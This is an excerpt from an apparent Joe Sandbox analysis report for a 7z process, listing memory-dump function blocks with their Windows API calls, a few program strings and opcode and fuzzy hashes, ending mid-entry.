                                                                                                                                                                                                                                • Opcode ID: bfe4f0f55ee913568f211c4fbf308b9aee0fbd2fe155706c5642a99402e277d4
                                                                                                                                                                                                                                • Instruction ID: ba2e3bc96a076f31311bf6e10e5b97213f3497eb66befcd80f87fc54c8590a2b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfe4f0f55ee913568f211c4fbf308b9aee0fbd2fe155706c5642a99402e277d4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25018023702A54A6DA24EF26D9105A92320F7A6FA4B1C8322EF7D17794CF34E852C350
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • free.MSVCRT ref: 001F3877
                                                                                                                                                                                                                                  • Part of subcall function 001F0BBC: free.MSVCRT ref: 001F0BCC
                                                                                                                                                                                                                                  • Part of subcall function 001F0BBC: free.MSVCRT ref: 001F0BD5
                                                                                                                                                                                                                                  • Part of subcall function 001F0BBC: free.MSVCRT ref: 001F0C00
                                                                                                                                                                                                                                  • Part of subcall function 001F0BBC: free.MSVCRT ref: 001F0C08
                                                                                                                                                                                                                                  • Part of subcall function 001F1474: free.MSVCRT ref: 001F14A6
                                                                                                                                                                                                                                  • Part of subcall function 001F1474: free.MSVCRT ref: 001F14AF
                                                                                                                                                                                                                                  • Part of subcall function 001F1474: free.MSVCRT ref: 001F14B8
                                                                                                                                                                                                                                  • Part of subcall function 001F1474: free.MSVCRT ref: 001F14C0
                                                                                                                                                                                                                                • free.MSVCRT ref: 001F3892
                                                                                                                                                                                                                                • free.MSVCRT ref: 001F389B
                                                                                                                                                                                                                                • free.MSVCRT ref: 001F38C6
                                                                                                                                                                                                                                • free.MSVCRT ref: 001F38CE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 18ccfc5564c15e61a23e9604fa5b251626cea37ac211422c809096770ce5a63d
                                                                                                                                                                                                                                • Instruction ID: 09f9e93202f4667df54a7e170405e46d344aa19fa150ed50c46844f03112dd34
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18ccfc5564c15e61a23e9604fa5b251626cea37ac211422c809096770ce5a63d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7F08123B12854A6CA15FE26DD5117C2320FBA5FD070D8262EF2D4B751DF20D9628350
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: c213d67050506c93901002ddd1084c0dd65243c9eb9d617befeb87ee319482a8
                                                                                                                                                                                                                                • Instruction ID: 09cb82c53952a84fd86934e602d49bba556e6cb3398e8c740a5a7118102067e2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c213d67050506c93901002ddd1084c0dd65243c9eb9d617befeb87ee319482a8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0FF0301371199889CA20EE26DD911A86330AFB6BE871C8172FF2E47755EF30D8528360
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: f7456f4712a6592163503973d257ef0995b2ed4d21bfa0f5baa221aafdf9fe8c
                                                                                                                                                                                                                                • Instruction ID: fdb598ffcd2f92334bfdc8e2004d8707f4dfd23a048b7ac3efad942da4dafa84
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f7456f4712a6592163503973d257ef0995b2ed4d21bfa0f5baa221aafdf9fe8c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6EF096537015888DCA10EE26DD812682320AF75BA9B1C8572FF2D07755EF30D8928350
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 99aac3ebba39b973ad56ba9f7cc64fb651a8512a5e29eea15e4582f1b066fd79
                                                                                                                                                                                                                                • Instruction ID: d928e0200b7e25659b0003a04a07eeb3025866b8182916e1b35d10b9ff5e9dfe
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99aac3ebba39b973ad56ba9f7cc64fb651a8512a5e29eea15e4582f1b066fd79
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7F01D237119848A8A25AE26DD5116C6334EBF5F9871D8172EF3D4B759DF30D8428350
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • free.MSVCRT ref: 002176AF
                                                                                                                                                                                                                                • free.MSVCRT ref: 002176BB
                                                                                                                                                                                                                                • free.MSVCRT ref: 002176C7
                                                                                                                                                                                                                                • free.MSVCRT ref: 002176D3
                                                                                                                                                                                                                                  • Part of subcall function 0021B310: free.MSVCRT ref: 0021B335
                                                                                                                                                                                                                                  • Part of subcall function 0021B310: free.MSVCRT ref: 0021B342
                                                                                                                                                                                                                                  • Part of subcall function 0021B310: free.MSVCRT ref: 0021B34E
                                                                                                                                                                                                                                  • Part of subcall function 0021B310: free.MSVCRT ref: 0021B358
                                                                                                                                                                                                                                  • Part of subcall function 0021B310: free.MSVCRT ref: 0021B362
                                                                                                                                                                                                                                  • Part of subcall function 0021B310: free.MSVCRT ref: 0021B36C
                                                                                                                                                                                                                                  • Part of subcall function 0021B310: free.MSVCRT ref: 0021B376
                                                                                                                                                                                                                                  • Part of subcall function 0021B310: free.MSVCRT ref: 0021B380
                                                                                                                                                                                                                                • free.MSVCRT ref: 002176E4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 80021553301d9a40d6bbe7854cc860826636cb7fafc5824219d75b22b7ddba10
                                                                                                                                                                                                                                • Instruction ID: ca881fff03346b9bd08d2748243965a753276e034a0b071e0f75fff1c42cddd9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80021553301d9a40d6bbe7854cc860826636cb7fafc5824219d75b22b7ddba10
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57E0C93222198081CA51EF35C8951EC2370E7B9B58F1C4172EA3E8E362DF20D9938760
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionThrow$memmove
                                                                                                                                                                                                                                • String ID: Internal collision in update action set
                                                                                                                                                                                                                                • API String ID: 265668421-2378581463
                                                                                                                                                                                                                                • Opcode ID: 2489d0cffbcfc2a2b50f9be8098032778b6c83d9b82680e9d68b7dd3d3502d6c
                                                                                                                                                                                                                                • Instruction ID: 5e70426c5e87755d40586272cfae8c5d8340a8b2ab46e717c58b4155413cf28d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2489d0cffbcfc2a2b50f9be8098032778b6c83d9b82680e9d68b7dd3d3502d6c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 124126323286858ADB24CF19E49479E7790F3A978CF448115EF8907B58D7B9D9E5CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • free.MSVCRT ref: 00206E91
                                                                                                                                                                                                                                  • Part of subcall function 001D3518: free.MSVCRT ref: 001D3551
                                                                                                                                                                                                                                  • Part of subcall function 001D3314: memmove.MSVCRT ref: 001D3339
                                                                                                                                                                                                                                • free.MSVCRT ref: 00206E83
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                                                • String ID: exe
                                                                                                                                                                                                                                • API String ID: 1534225298-1801697008
                                                                                                                                                                                                                                • Opcode ID: 76770eb1b0aff3fcbaddab3083a3c2637205f7744bad9aa1b7e03b28f3d0466f
                                                                                                                                                                                                                                • Instruction ID: 7f8ac7e46a4c26738fe213097d7be04c21c40a3e0c1a30ec9130e384d6dbae79
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76770eb1b0aff3fcbaddab3083a3c2637205f7744bad9aa1b7e03b28f3d0466f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4318633314A4196CB20EF25E44019EB731F7957D4F845222EBAE477AADF28D65ACB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$ByteStringmemmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 400576877-0
                                                                                                                                                                                                                                • Opcode ID: 627be9a5ab345c6a2ae9b3d4a8fa1f013a1db37638386f1ebadb93c6192a02ff
                                                                                                                                                                                                                                • Instruction ID: 8711f7fd882339e2c10e948ee185b2b2191247e0277dedac868561ce772c333c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 627be9a5ab345c6a2ae9b3d4a8fa1f013a1db37638386f1ebadb93c6192a02ff
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9921B57330478492EB24AF51E6903BD6260FBA87A4F484125EFAE0B794DF78C856C705
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$wcscmp
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4021281200-0
                                                                                                                                                                                                                                • Opcode ID: 0bac5f4983b55f5b0d32204177355077f18131e63a01caf0778d328eb0156594
                                                                                                                                                                                                                                • Instruction ID: d15a2763b48687420b9f639ece2617a4a7a1c76c0b6155da475d39bc1566f7a8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0bac5f4983b55f5b0d32204177355077f18131e63a01caf0778d328eb0156594
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8921B07621474492DB20BE26E4403B97761E7E5BE4F185322EF7A877A4EF38D586CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID: Unsupported charset:
                                                                                                                                                                                                                                • API String ID: 1294909896-616772432
                                                                                                                                                                                                                                • Opcode ID: 9e42c2d2b4e1f7d5b703db533c77dc73d7d9a80e6522a8e966b0da96d7856300
                                                                                                                                                                                                                                • Instruction ID: f637167f627a5541c41d42de3f814448ae7ec57733b96b2e2eabf105ab9ff8c8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e42c2d2b4e1f7d5b703db533c77dc73d7d9a80e6522a8e966b0da96d7856300
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4921A463604A0092DB20DB18D8907AD7721E7E47E8F544327EBAE077B5CF78CA86C740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 001D7D4C: GetFileAttributesW.KERNELBASE ref: 001D7D6E
                                                                                                                                                                                                                                  • Part of subcall function 001D7D4C: GetFileAttributesW.KERNEL32 ref: 001D7DA5
                                                                                                                                                                                                                                  • Part of subcall function 001D7D4C: free.MSVCRT ref: 001D7DB2
                                                                                                                                                                                                                                • DeleteFileW.KERNEL32 ref: 001D6D90
                                                                                                                                                                                                                                • DeleteFileW.KERNEL32 ref: 001D6DCA
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D6DDA
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D6DE8
                                                                                                                                                                                                                                  • Part of subcall function 001D68A0: SetFileAttributesW.KERNELBASE ref: 001D68C7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$Attributesfree$Delete
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 324319583-0
                                                                                                                                                                                                                                • Opcode ID: 9ea681c350cecb0b42c71b1f35ea49690d0665b5843397cde649d2af5f6ea4c4
                                                                                                                                                                                                                                • Instruction ID: fa2849934839c1bd9c6f0b3e3898e5235f3af13214a96968bbc9a04554d5a610
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ea681c350cecb0b42c71b1f35ea49690d0665b5843397cde649d2af5f6ea4c4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63012D22344E4145CE30AB65BC553A913225BA6BB4F5C1323EDFA8B3E6EF29C9569600
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 001E2137
                                                                                                                                                                                                                                • free.MSVCRT ref: 001E21BB
                                                                                                                                                                                                                                  • Part of subcall function 001D6618: FormatMessageW.KERNEL32 ref: 001D6676
                                                                                                                                                                                                                                  • Part of subcall function 001D6618: LocalFree.KERNEL32 ref: 001D6698
                                                                                                                                                                                                                                  • Part of subcall function 001D362C: memmove.MSVCRT ref: 001D3659
                                                                                                                                                                                                                                • free.MSVCRT ref: 001E2182
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$ErrorFormatFreeLastLocalMessagememmove
                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                • API String ID: 1743135865-3653984579
                                                                                                                                                                                                                                • Opcode ID: 0bd9cf6b41112b825cc91f2e3a5d39e6d602e68f921f465e2c8b822415a3c1c2
                                                                                                                                                                                                                                • Instruction ID: 48b072640f83ad1d4b431636608ff52b3513c60794718d3ffffe979fc7e0c4df
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0bd9cf6b41112b825cc91f2e3a5d39e6d602e68f921f465e2c8b822415a3c1c2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B101696730090091CA21EB25E88525E6731EBE5BF4F585322BE6E477B9DF38CB86C750
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2244327787-0
                                                                                                                                                                                                                                • Opcode ID: e021971f243c9fea39bb415f90c700eab78ade398cc3b993660b20944e3800b0
                                                                                                                                                                                                                                • Instruction ID: 7cc65cce434d5328cf703dbaa7df0624916f020306e4b328e7a6c66b342b3196
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e021971f243c9fea39bb415f90c700eab78ade398cc3b993660b20944e3800b0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9701DF226200629BD7219B3D99047A96394B718BE5F914632FE4ECBB50DB28CC81D7C0
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs
                                                                                                                                                                                                                                • String ID: Break signaled$ERROR: Can't allocate required memory!$System ERROR:
                                                                                                                                                                                                                                • API String ID: 1795875747-932691680
                                                                                                                                                                                                                                • Opcode ID: ab942afea8ab6607a7c9d9281537d5881677c1f1a7467293dd987fcb7a8caf1a
                                                                                                                                                                                                                                • Instruction ID: 9154cbde69110487f2f53d5148c8c559cc76384e1068413798a0b84196f3baf2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab942afea8ab6607a7c9d9281537d5881677c1f1a7467293dd987fcb7a8caf1a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA014C32266D04EADA05EF60F8853E82360EBB5749F945422E90D83664DF3CC9E5C782
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DirectoryRemovefree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 736856642-0
                                                                                                                                                                                                                                • Opcode ID: efb7360f27999ac7bd03661593c0501c8d3dd599b59c9a8bab47d3410f2a5fdb
                                                                                                                                                                                                                                • Instruction ID: f89e956fd6b93ca67ab93c045899ed33529fc9a1300a77d3b8c2c56fe4d99618
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efb7360f27999ac7bd03661593c0501c8d3dd599b59c9a8bab47d3410f2a5fdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67F0A42220860185C934AF25D9A437D5324ABA67F8F484323EEBD877A5CF39C94ACB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _CxxThrowException.MSVCRT ref: 001D2F5B
                                                                                                                                                                                                                                  • Part of subcall function 001D2130: malloc.MSVCRT ref: 001D2134
